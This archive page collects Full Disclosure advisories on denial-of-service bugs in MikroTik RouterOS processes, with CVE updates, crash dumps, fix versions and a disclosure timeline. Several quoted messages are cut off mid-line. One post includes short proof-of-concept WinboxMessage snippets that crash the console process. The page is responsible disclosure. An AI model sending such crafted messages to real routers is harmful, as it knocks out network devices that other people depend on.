>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-15:48:13.77@0: 776f7000-77711000 r-xp

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C

[Update 2021/05/05] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20267: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /nova/bin/resolver process. An
authenticated remote attacker can cause a Denial of Service due to invalid
memory access.

CVE-2020-20225: Mikrotik RouterOs before 6.47 (stable tree) suffers from an
assertion failure vulnerability in the /nova/bin/user process. An
authenticated remote attacker can cause a Denial of Service due to an
assertion failure via a crafted packet.


Q C  于2020年9月9日周三 下午9:02写道：

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> 1. memory corruption
> The resolver process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> resolver process due to invalid memory access.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.27@0:
> 2020.06.18-14:38:03.28@0: /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: --- signal=11
> 
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
> 2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018
> ebp=0x7fe5fd08 esp=0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98
> ecx=0x77676f00 edx=0x0005
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: maps:
> 2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995
>  /nova/bin/resolver
> 2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
> 2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc
> e5 7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
> 2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c
> 00 00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
> 2020.06.18-14:38:03.28@0:
> 2020.06.18-14:38:03.28@0: code: 0x80508f6
> 2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72
> 04 8b
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The user process suffers from an assertion failure vulnerability. There is
> a reachable assertion in the user process. By sending a crafted packet, an
> authenticated remote user can crash the user process due to assertion
> failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: /nova/bin/user
> 2020.06.04-17:56:52.31@0: --- signal=6
> 
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
> 2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200
> ebp=0x7fee3790 esp=0x7fee3788
> 2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4
> ecx=0x00b4 edx=0x0006
> 2020.06.04-17:56:52.31@0:
> 2020.06.04-17:56:52.31@0: maps:
> 2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002
>   /nova/bin/user
> 2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-17:56:52.31@0: 7769-776ad000 r

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C

[Update 2021/05/04] Three CVEs have been assigned to these vulnerabilities.

CVE-2020-20266: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /nova/bin/dot1x process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).

CVE-2020-20264: Mikrotik RouterOs before 6.47 (stable tree) in the
/ram/pckg/advanced-tools/nova/bin/netwatch process. An authenticated remote
attacker can cause a Denial of Service due to a divide by zero error.

CVE-2020-20265: Mikrotik RouterOs before 6.47 (stable tree) suffers from a
memory corruption vulnerability in the /ram/pckg/wireless/nova/bin/wireless
process. An authenticated remote attacker can cause a Denial of Service due
via a crafted packet.





Q C  于2020年8月27日周四 下午7:16写道：

> Advisory: three vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> 1. NULL pointer dereference
> The dot1x process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the dot1x
> process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-14:51:29.47@0:
> 2020.06.04-14:51:29.47@0:
> 2020.06.04-14:51:29.81@0: /nova/bin/dot1x
> 2020.06.04-14:51:29.81@0: --- signal=11
> 
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: eip=0x776a51e5 eflags=0x00010202
> 2020.06.04-14:51:29.81@0: edi=0x7fc51064 esi=0x08062ed0
> ebp=0x7fc50f78 esp=0x7fc50f6c
> 2020.06.04-14:51:29.81@0: eax=0x ebx=0x776ad4ec
> ecx=0x edx=0x08062e28
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: maps:
> 2020.06.04-14:51:29.81@0: 08048000-0805f000 r-xp  00:0c 1064
>   /nova/bin/dot1x
> 2020.06.04-14:51:29.81@0: 7764a000-7767f000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-14:51:29.81@0: 77683000-7769d000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-14:51:29.81@0: 7769e000-776ad000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-14:51:29.81@0: 776ae000-776b4000 r-xp  00:0c 951
>  /lib/liburadius.so
> 2020.06.04-14:51:29.81@0: 776b5000-776bd000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-14:51:29.81@0: 776be000-776db000 r-xp  00:0c 947
>  /lib/libucrypto.so
> 2020.06.04-14:51:29.81@0: 776dc000-77728000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.04-14:51:29.81@0: 7772e000-77735000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: stack: 0x7fc52000 - 0x7fc50f6c
> 2020.06.04-14:51:29.81@0: 00 00 00 00 90 27 06 08 e4 8a 72 77 a8 0f
> c5 7f 2e be 6f 77 90 27 06 08 d0 2e 06 08 28 2e 06 08
> 2020.06.04-14:51:29.81@0: 28 2e 06 08 a4 0f c5 7f f0 da 6b 77 05 00
> 00 00 f0 da 6b 77 e0 2d 06 08 64 10 c5 7f e8 0f c5 7f
> 2020.06.04-14:51:29.81@0:
> 2020.06.04-14:51:29.81@0: code: 0x776a51e5
> 2020.06.04-14:51:29.81@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75
> 08 e8
>
> This vulnerability was initially found in stable 6.46.3, and was fixed in
> stable 6.47.
>
> 2. division by zero
> The netwatch process suffers from a division-by-zero vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> netwatch process due to arithmetic exception.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0: /ram/pckg/advanced-tools/nova/bin/netwatch
> 2020.06.04-16:25:57.65@0: --- signal=8
> 
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0: eip=0x0804c6d7 eflags=0x00010246
> 2020.06.04-16:25:57.65@0: edi=0x5ed9208c esi=0x
> ebp=0x73f8 esp=0x73b0
> 2020.06.04-16:25:57.65@0: eax=0x ebx=0x08051020
> ecx=0x edx=0x
> 2020.06.04-16:25:57.65@0:
> 2020.06.04-16:25:57.65@0: maps:
> 2020.06.04-16:25:57.65@0: 08048000-0804d000 r-xp  00:1a 14
>   /ra

Re: [FD] Three vulnerabilities found in MikroTik's RouterOS

2021-05-07 Thread Q C

[update 2021/05/04] Three CVEs have been assigned to these vulnerabilities.

CVE-2020-20215: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/diskd process. An
authenticated remote attacker can cause a Denial of Service due to invalid
memory access.

CVE-2020-20216: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/graphing process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference)

CVE-2020-20213: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from an
stack exhaustion vulnerability in the /nova/bin/net process. An
authenticated remote attacker can cause a Denial of Service due to
overloading the systems CPU



Q C  于2020年7月22日周三 下午8:11写道：

> Advisory: three vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> 1. Memory corruption vulnerability
> The diskd process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the diskd
> process due to invalid memory access.
>
> Against stable 6.44.3, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0: /nova/bin/diskd
> 2020.06.04-14:18:22.55@0: --- signal=11
> 
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202
> 2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790
> ebp=0x7fd40b78 esp=0x7fd40b6c
> 2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec
> ecx=0x776d54ec edx=0x20fe0010
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0: maps:
> 2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp  00:0c 1131
>   /nova/bin/diskd
> 2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp  00:0c 996
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp  00:0c 992
>  /lib/libgcc_s.so.1
> 2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp  00:0c 976
>  /lib/libuc++.so
> 2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp  00:0c 982
>  /lib/libubox.so
> 2020.06.04-14:18:22.55@0: 776df000-7772b000 r-xp  00:0c 978
>  /lib/libumsg.so
> 2020.06.04-14:18:22.55@0: 77731000-77738000 r-xp  00:0c 990
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0: stack: 0x7fd41000 - 0x7fd40b6c
> 2020.06.04-14:18:22.55@0: ec 54 6d 77 1b 00 00 00 88 67 05 08 98 0b
> d4 7f c6 c6 04 08 88 67 05 08 1b 00 00 00 10 00 fe 20
> 2020.06.04-14:18:22.55@0: 10 00 fe 20 ec 54 6d 77 f0 ea 6d 77 08 0c
> d4 7f 6d a9 6d 77 88 67 05 08 1b 00 00 00 05 00 00 00
> 2020.06.04-14:18:22.55@0:
> 2020.06.04-14:18:22.55@0: code: 0x776cd1db
> 2020.06.04-14:18:22.55@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50
> ff 75
>
> This vulnerability was initially found in long-term 6.44.5, and has been
> fixed in stable 6.47.
>
> 2. NULL pointer dereference vulnerability
> The graphing process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> graphing process due to NULL
> pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-15:12:41.47@0:
> 2020.06.04-15:12:41.47@0:
> 2020.06.04-15:12:41.47@0: /nova/bin/graphing
> 2020.06.04-15:12:41.47@0: --- signal=11
> 
> 2020.06.04-15:12:41.47@0:
> 2020.06.04-15:12:41.47@0: eip=0x080521e2 eflags=0x00010202
> 2020.06.04-15:12:41.47@0: edi=0x080610a0 esi=0x08061cb8
> ebp=0x7fa8acd8 esp=0x7fa8acb0
> 2020.06.04-15:12:41.47@0: eax=0x08061db8 ebx=0x7fa8ad0c
> ecx=0x edx=0x08061ce8
> 2020.06.04-15:12:41.47@0:
> 2020.06.04-15:12:41.47@0: maps:
> 2020.06.04-15:12:41.47@0: 08048000-0805c000 r-xp  00:0c 1038
>   /nova/bin/graphing
> 2020.06.04-15:12:41.47@0: 77651000-77686000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-15:12:41.47@0: 7768a000-776a4000 r

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C

[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20219: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/igmp-proxy process. An
authenticated remote attacker can cause a Denial of Service (NULL pointer
dereference).

CVE-2020-20262: Mikrotik RouterOs before 6.47 (stable tree) suffers from an
assertion failure vulnerability in the /ram/pckg/security/nova/bin/ipsec
process. An authenticated remote attacker can cause a Denial of Service due
to an assertion failure via a crafted packet.



Q C  于2020年8月13日周四 下午7:14写道：

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> 1. NULL pointer dereference
> The igmpproxy process suffers from a memory corruption vulnerability. By
> sending a crafted packet, an authenticated remote user can crash the
> igmpproxy process due to NULL pointer dereference.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: --- signal=11
> 
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
> 2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8
> ebp=0x7fa932a8 esp=0x7fa9326c
> 2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x
> ecx=0x000b edx=0x
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: maps:
> 2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp  00:13 16
>   /ram/pckg/multicast/nova/bin/igmpproxy
> 2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp  00:0c 944
>  /lib/libuc++.so
> 2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp  00:0c 950
>  /lib/libubox.so
> 2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp  00:0c 946
>  /lib/libumsg.so
> 2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp  00:0c 958
>  /lib/ld-uClibc-0.9.33.2.so
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
> 2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32
> a9 7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
> 2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32
> a9 7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
> 2020.06.04-17:44:27.12@0:
> 2020.06.04-17:44:27.12@0: code: 0x8050a8d
> 2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4
> 0c 0f
>
> This vulnerability was initially found in long-term 6.44.6, and was fixed
> in stable 6.47.
>
> 2. reachable assertion failure
> The ipsec process suffers from an assertion failure vulnerability. There
> is a reachable assertion in the ipsec process. By sending a crafted packet,
> an authenticated remote user can crash the ipsec process due to assertion
> failure.
>
> Against stable 6.46.5, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: --- signal=6
> 
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
> 2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200
> ebp=0x7f8fa450 esp=0x7f8fa448
> 2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291
> ecx=0x0291 edx=0x0006
> 2020.06.04-18:25:16.04@0:
> 2020.06.04-18:25:16.04@0: maps:
> 2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp  00:11 42
>   /ram/pckg/security/nova/bin/ipsec
> 2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp  00:0c 964
>  /lib/libuClibc-0.9.33.2.so
> 2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp  00:0c 960
>  /lib/libgcc_s.so.1
> 2020.06.04-18:25:16.04@0: 774a7000

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C

[Update 2021/05/04] Two CVEs have been assigned to these vulnerabilities.

CVE-2020-20221: Mikrotik RouterOs before 6.44.6 (long-term tree) suffers
from an uncontrolled resource consumption vulnerability in the
/nova/bin/cerm process. An authenticated remote attacker can cause a Denial
of Service due to overloading the systems CPU.

CVE-2020-20218: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a
memory corruption vulnerability in the /nova/bin/traceroute process. An
authenticated remote attacker can cause a Denial of Service due via the
loop counter variable.



Q C  于2020年5月10日周日 上午10:41写道：

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: until stable 6.45.7 (first vulnerability), until stable
> 6.46.4 (second vulnerability)
> Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second
> vulnerability)
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
>
> Product Description
> ==
>
> RouterOS is the operating system used on the MikroTik's devices, such as
> switch, router and access point.
>
>
> Description of vulnerabilities
> ==
>
> These two vulnerabilities were tested only against the MikroTik RouterOS
> stable release tree when found. Maybe other release trees also suffer from
> these vulnerabilities.
>
> 1. The cerm process suffers from an uncontrolled resource consumption
> issue. By sending a crafted packet, an authenticated remote user can cause
> a high cpu load, which may make the device respond slowly or unable to
> respond.
>
> 2. The traceroute process suffers from a memory corruption issue. By
> sending a crafted packet, an authenticated remote user can crash the
> traceroute process due to invalid memory access.
>
>
> Solution
> 
>
> Upgrade to the corresponding latest RouterOS tree version.
>
>
> References
> ==
>
> [1] https://mikrotik.com/download/changelogs/stable-release-tree
>
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2021-05-04 Thread Q C

[Update 2021/05/04] CVE-2020-20212 and CVE-2020-20211 have been
assigned to these two vulnerabilities.


CVE-2020-20212: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from
a memory corruption vulnerability in the /nova/bin/console process. An
authenticated remote attacker can cause a Denial of Service (NULL
pointer dereference)


CVE-2020-20211: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from
an assertion failure vulnerability in the /nova/bin/console process.
An authenticated remote attacker can cause a Denial of Service due to
an assertion failure via a crafted packet





Q C  于2020年4月14日周二 下午6:29写道：

> [Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
> from these two vulnerabilities.
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Affected Versions: through 6.46.5 (stable release tree)
> Fixed Versions: -
> Vendor URL: https://mikrotik.com/
> Vendor Status: not fix yet
> CVE: -
> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>
> Poc
> ===
> The following pocs are based on the tool routeros (
> https://github.com/tenable/routeros)
>
> 1) memory corruption in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe000c, -1);
> msg.add_u32(9, 9);
>
> 2) assertion failure in console process
>
> WinboxMessage msg;
> msg.set_to(48, 4);
> msg.set_command(0xfe0005);
> msg.add_u32(0xfe0001, 0);
>
> Disclosure timeline
> ===
> 2019/08/23reported the 2nd issue to the vendor
> 2019/08/26reported the 1st issue to the vendor
> 2019/08/28vendor reproduced the 1st issue and will fix it as soon as
> possible
> 2019/08/30vendor reproduced the 2nd issue and will fix it as soon as
> possible
> 2019/12/02notified the vendor the 1st issue still exists in version
> 6.44.6 (2nd issue fixed)
> 2020/01/06no response from the vendor, and did the initial disclosure
> 2020/04/14re-tested these two issues against the stable 6.46.5, and
> updated the disclosure
>
>
>
> Q C  于2020年1月6日周一 下午7:32写道：
>
>> Advisory: two vulnerabilities found in MikroTik's RouterOS
>>
>>
>> Details
>> ===
>>
>> Product: MikroTik's RouterOS
>> Affected Versions: before 6.44.6 (Long-term release tree)
>> Fixed Versions: 6.44.6 (Long-term release tree)
>> Vendor URL: https://mikrotik.com/
>> Vendor Status: fixed version released
>> CVE: -
>> Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>>
>>
>> Product Description
>> ==
>>
>> RouterOS is the operating system used on the MikroTik's devices, such as
>> switch, router and access point.
>>
>>
>> Description of vulnerabilities
>> ==
>>
>> These two vulnerabilities were tested only against the MikroTik RouterOS
>> long-term release tree when found. Maybe other release trees also suffer
>> from these issues.
>>
>> 1. The console process suffers from a memory corruption issue.
>> An authenticated remote user can crash the console process due to a NULL
>> pointer reference by sending a crafted packet.
>>
>> 2. The console process suffers from an assertion failure issue. There is
>> a reachable assertion in the console process. An authenticated remote user
>> can crash the console process duo to assertion failure by sending a crafted
>> packet.
>>
>> Solution
>> 
>>
>> Upgrade to the corresponding latest RouterOS tree version.
>>
>>
>> References
>> ==
>>
>> [1] https://mikrotik.com/download/changelogs/long-term-release-tree
>>
>

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-09-11 Thread Q C

Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as
switch, router and access point.


Description of vulnerabilities
==

1. memory corruption
The resolver process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
resolver process due to invalid memory access.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.27@0:
2020.06.18-14:38:03.28@0: /nova/bin/resolver
2020.06.18-14:38:03.28@0: --- signal=11

2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: eip=0x080508f6 eflags=0x00010206
2020.06.18-14:38:03.28@0: edi=0x08060620 esi=0x08062018 ebp=0x7fe5fd08
esp=0x7fe5fcc0
2020.06.18-14:38:03.28@0: eax=0x000c ebx=0x08061c98 ecx=0x77676f00
edx=0x0005
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: maps:
2020.06.18-14:38:03.28@0: 08048000-0805c000 r-xp  00:0c 995
   /nova/bin/resolver
2020.06.18-14:38:03.28@0: 7763f000-77674000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0: 77678000-77692000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.18-14:38:03.28@0: 77693000-776a2000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.18-14:38:03.28@0: 776a3000-776ab000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.18-14:38:03.28@0: 776ac000-776f8000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.18-14:38:03.28@0: 776fe000-77705000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: stack: 0x7fe6 - 0x7fe5fcc0
2020.06.18-14:38:03.28@0: 03 00 00 00 e4 8a 6f 77 38 fd e5 7f e4 fc e5
7f c0 dc 05 08 5c 03 e6 7f 08 fd e5 7f 1f e7 04 08
2020.06.18-14:38:03.28@0: 58 21 06 08 48 06 06 08 f8 1f 06 08 c0 0c 00
00 1c fd e5 7f 28 c7 05 08 02 fb 6f 77 98 1c 06 08
2020.06.18-14:38:03.28@0:
2020.06.18-14:38:03.28@0: code: 0x80508f6
2020.06.18-14:38:03.28@0: 88 10 8b 43 14 40 89 43 14 8b 55 dc 8d 72 04
8b

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.

2. reachable assertion failure
The user process suffers from an assertion failure vulnerability. There is
a reachable assertion in the user process. By sending a crafted packet, an
authenticated remote user can crash the user process due to assertion
failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: /nova/bin/user
2020.06.04-17:56:52.31@0: --- signal=6

2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: eip=0x7765a55b eflags=0x0246
2020.06.04-17:56:52.31@0: edi=0x00fe0001 esi=0x77662200 ebp=0x7fee3790
esp=0x7fee3788
2020.06.04-17:56:52.31@0: eax=0x ebx=0x00b4 ecx=0x00b4
edx=0x0006
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: maps:
2020.06.04-17:56:52.31@0: 08048000-08059000 r-xp  00:0c 1002
/nova/bin/user
2020.06.04-17:56:52.31@0: 7762c000-77661000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0: 77665000-7767f000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-17:56:52.31@0: 7768-7768f000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-17:56:52.31@0: 7769-776ad000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.04-17:56:52.31@0: 776ae000-776b4000 r-xp  00:0c 951
   /lib/liburadius.so
2020.06.04-17:56:52.31@0: 776b5000-776bd000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-17:56:52.31@0: 776be000-776c1000 r-xp  00:0c 948
   /lib/libuxml++.so
2020.06.04-17:56:52.31@0: 776c2000-7770e000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-17:56:52.31@0: 77714000-7771b000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: stack: 0x7fee4000 - 0x7fee3788
